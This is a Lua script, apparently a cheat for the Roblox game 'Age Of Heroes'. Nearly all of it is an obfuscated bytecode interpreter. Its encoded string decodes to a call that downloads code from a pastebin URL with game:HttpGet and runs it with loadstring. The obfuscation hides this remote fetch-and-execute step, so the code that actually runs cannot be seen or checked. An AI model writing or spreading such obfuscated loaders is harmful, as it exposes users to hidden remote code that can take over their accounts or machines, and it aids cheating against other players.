--[[
â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•— â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•— â–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—     
â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â•â•â•â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—    
â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â–ˆâ–ˆâ•— â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘    
â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â•  â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â•šâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘    
â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â•šâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â•šâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•‘ â•šâ–ˆâ–ˆâ–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•    
â•šâ•â•  â•šâ•â•â•šâ•â•â•â•â•â•â•â•šâ•â•â•â•â•â•  â•šâ•â•â•â•â•â•  â•šâ•â•â•â•â•â• â•šâ•â•  â•šâ•â•â•â•â•šâ•â•â•â•â•â• 
                 Age Of Heroes Script Remastered ðŸ˜€
                 Also dont Skid.. Please :)
]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/(((882 -(282 + 595)) -3)^(v32-1)))%((5 -(1640 -(1523 + 114)))^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=931 -(857 + 74) ;local v85;while true do if (v84==(568 -(367 + 201))) then v85=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and 1) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + 0 );v19=v19 + ((21 -16) -1) ;return (v37 * ((16778398 -(32 + 85)) -(68 + 997))) + (v36 * (66806 -(226 + 1044))) + (v35 * 256) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==3) then v45=nil;while true do if (v39~=0) then else local v98=0;while true do if (v98~=0) then else v40={};v41={};v98=255 -(163 + 91) ;end if (v98==(1931 -(1869 + 61))) then v42={};v39=1 + 0 ;break;end end end if (v39~=(10 -7)) then else local v99=0 -0 ;while true do if (v99==0) then for v103=1 + 0 ,v24() do v41[v103-1 ]=v29();end return v43;end end end if (v39==2) then local v100=0;local v101;while true do if (v100~=0) then else v101=0 -0 ;while true do if (0~=v101) then else local v124=0 + 0 ;while true do if (v124~=(1474 -(1329 + 145))) then else for v161=972 -(140 + 831) ,v44 do local v162=0;local v163;local v164;local v165;local v166;while true do if (v162==(1850 -(1409 + 441))) then v163=0;v164=nil;v162=719 -(15 + 703) ;end if (v162==1) then v165=nil;v166=nil;v162=1 + 1 ;end if (v162==2) then while true do if (v163==(439 -(262 + 176))) then v166=nil;while true do if (v164~=(1721 -(345 + 1376))) then else local v175=0;local v176;while true do if (v175==0) then v176=688 -(198 + 490) ;while true do if (v176~=(0 -0)) then else local v182=0 -0 ;local v183;while true do if (v182==0) then v183=0;while true do if ((1207 -(696 + 510))~=v183) then else v176=1;break;end if (v183~=(0 -0)) then else v165=v22();v166=nil;v183=1;end end break;end end end if (v176==1) then v164=1263 -(1091 + 171) ;break;end end break;end end end if (v164==(1 + 0)) then if (v165==(3 -2)) then v166=v22()~=0 ;elseif (v165==(6 -4)) then v166=v25();elseif (v165~=(377 -(123 + 251))) then else v166=v26();end v45[v161]=v166;break;end end break;end if (v163==(0 -0)) then local v168=0;local v169;while true do if (v168~=(698 -(208 + 490))) then else v169=0 + 0 ;while true do if (1==v169) then v163=1 + 0 ;break;end if (v169==(836 -(660 + 176))) then v164=0;v165=nil;v169=1 + 0 ;end end break;end end end end break;end end end v43[3]=v22();v124=1;end if (v124~=1) then else v101=203 -(14 + 188) ;break;end end end if ((676 -(534 + 141))~=v101) then else for v128=1,v24() do local v129=0;local v130;local v131;local v132;while true do if (v129~=0) then else v130=0;v131=nil;v129=1 + 0 ;end if (v129~=1) then else v132=nil;while true do if (v130~=0) then else local v167=0;while true do if (v167~=0) then else v131=0 + 0 ;v132=nil;v167=1 + 0 ;end if (v167==1) then v130=1 -0 ;break;end end end if (v130==1) then while true do if (v131==0) then v132=v22();if (v21(v132,1 -0 ,2 -1 )==0) then local v170=0;local v171;local v172;local v173;local v174;while true do if (v170~=0) then else v171=0 + 0 ;v172=nil;v170=1 + 0 ;end if (v170~=(397 -(115 + 281))) then else v173=nil;v174=nil;v170=2;end if (v170==(4 -2)) then while true do if (v171==2) then local v178=0;while true do if (v178~=(1 + 0)) then else v171=7 -4 ;break;end if ((0 -0)==v178) then if (v21(v173,1,1)==1) then v174[869 -(550 + 317) ]=v45[v174[2 -0 ]];end if (v21(v173,2,2 -0 )==(2 -1)) then v174[288 -(134 + 151) ]=v45[v174[1668 -(970 + 695) ]];end v178=1 -0 ;end end end if (v171==0) then local v179=0;while true do if (v179==(1990 -(582 + 1408))) then v172=v21(v132,2,3);v173=v21(v132,4,6);v179=3 -2 ;end if (v179~=(1 -0)) then else v171=1;break;end end end if (v171~=3) then else if (v21(v173,3,3)==1) then v174[15 -11 ]=v45[v174[1828 -(1195 + 629) ]];end v40[v128]=v174;break;end if (v171~=(1 -0)) then else local v181=0;while true do if (v181==1) then v171=243 -(187 + 54) ;break;end if (v181~=0) then else v174={v23(),v23(),nil,nil};if (v172==(0 + 0)) then local v190=0;local v191;local v192;while true do if (v190==(0 -0)) then v191=0;v192=nil;v190=1 -0 ;end if (1~=v190) then else while true do if (v191~=(0 + 0)) then else v192=1636 -(1373 + 263) ;while true do if (v192~=(1000 -(451 + 549))) then else v174[3]=v23();v174[2 + 2 ]=v23();break;end end break;end end break;end end elseif (v172==1) then v174[4 -1 ]=v24();elseif (v172==(2 -0)) then v174[1387 -(746 + 638) ]=v24() -((1 + 1)^16) ;elseif (v172==3) then local v195=0 -0 ;while true do if (v195~=0) then else v174[344 -(218 + 123) ]=v24() -(2^(1597 -(1535 + 46))) ;v174[4]=v23();break;end end end v181=1;end end end end break;end end end break;end end break;end end break;end end end v39=3;break;end end break;end end end if (v39==(1 + 0)) then local v102=0;while true do if (v102==1) then v45={};v39=2;break;end if (v102~=0) then else v43={v40,v41,nil,v42};v44=v24();v102=1468 -(899 + 568) ;end end end end break;end if (v38~=(1 + 0)) then else v41=nil;v42=nil;v38=4 -2 ;end if (0~=v38) then else v39=0;v40=nil;v38=1;end if ((605 -(268 + 335))==v38) then v43=nil;v44=nil;v38=293 -(60 + 230) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (2==v46) then v51=v21(v48,593 -(426 + 146) ,4 + 27 );v52=((v21(v48,4 + 28 )==(1 + 0)) and  -(1457 -(192 + 90 + (2617 -1443)))) or (530 -(406 + 123)) ;v46=814 -(569 + 242) ;end if (v46==(8 -5)) then if (v51==0) then if (v50==(0 + 0)) then return v52 * (1322 -(1249 + 73)) ;else v51=1 + 0 ;v49=(2965 -1941) -(706 + (484 -(122 + 44))) ;end elseif (v51==(3298 -(721 + 530))) then return ((v50==(1271 -(945 + (562 -236)))) and (v52 * (1/(1900 -(106 + 1794))))) or (v52 * NaN) ;end return v8(v52,v51-(324 + 699) ) * (v49 + (v50/((4 -2)^((155 -108) + 5)))) ;end if (v46==(700 -(271 + 429))) then v47=v24();v48=v24();v46=(2 + 0) -1 ;end if (v46==(1 + 0)) then v49=115 -(4 + 110) ;v50=(v21(v48,1501 -(1408 + 92) ,(160 + 946) -((933 -472) + (690 -(30 + 35))) ) * ((1429 -(41 + 1386))^(1320 -(993 + 295)))) + v47 ;v46=2;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 + 0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1258 -(1043 + 214)) );v19=v19 + v53 ;local v55={};for v67=3 -2 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=1212 -(323 + (1871 -(18 + 964))) ;local v58;local v59;while true do if (v57==(2 -(3 -2))) then return (v59 * (836 -(361 + 219))) + v58 ;end if ((320 -(31 + 22 + 267))==v57) then v58,v59=v1(v16,v19,v19 + 2 );v19=v19 + 1 + 1 ;v57=414 -(15 + 398) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v86=0;while true do if (v86==0) then v20=v0(v3(v60,1,1));return "";end end else local v87=v2(v0(v60,16));if v20 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v87,v20);v20=nil;v90=1;end end else return v87;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v89=0;while true do if (v89==1) then if (v82<=3) then if (v82<=1) then if (v82>0) then do return;end else local v105=0;local v106;local v107;local v108;local v109;local v110;while true do if (v105==0) then v106=nil;v107,v108=nil;v109=nil;v110=nil;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v105=1;end if (v105==2) then v79[v110 + 1 ]=v109;v79[v110]=v109[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v105=3;end if (3==v105) then v81=v69[v73];v110=v81[2];v107,v108=v72(v79[v110](v13(v79,v110 + 1 ,v81[3])));v74=(v108 + v110) -1 ;v106=0;for v158=v110,v74 do v106=v106 + 1 ;v79[v158]=v107[v106];end v105=4;end if (5==v105) then v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end break;end if (v105==1) then v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v110=v81[2];v109=v79[v81[3]];v105=2;end if (v105==4) then v73=v73 + 1 ;v81=v69[v73];v110=v81[2];v79[v110]=v79[v110](v13(v79,v110 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v105=5;end end end elseif (v82>2) then v79[v81[2]]=v63[v81[3]];else v79[v81[2]]();end elseif (v82<=5) then if (v82==4) then v79[v81[2]]=v81[3];else local v115=v81[2];local v116,v117=v72(v79[v115](v13(v79,v115 + 1 ,v81[3])));v74=(v117 + v115) -1 ;local v118=0;for v125=v115,v74 do v118=v118 + 1 ;v79[v125]=v116[v118];end end elseif (v82==6) then local v119=v81[2];v79[v119]=v79[v119](v13(v79,v119 + 1 ,v74));else local v121=0;local v122;local v123;while true do if (v121==1) then v79[v122 + 1 ]=v123;v79[v122]=v123[v81[4]];break;end if (v121==0) then v122=v81[2];v123=v79[v81[3]];v121=1;end end end v73=v73 + 1 ;break;end if (v89==0) then v81=v69[v73];v82=v81[1];v89=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F3637796833514C3600083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
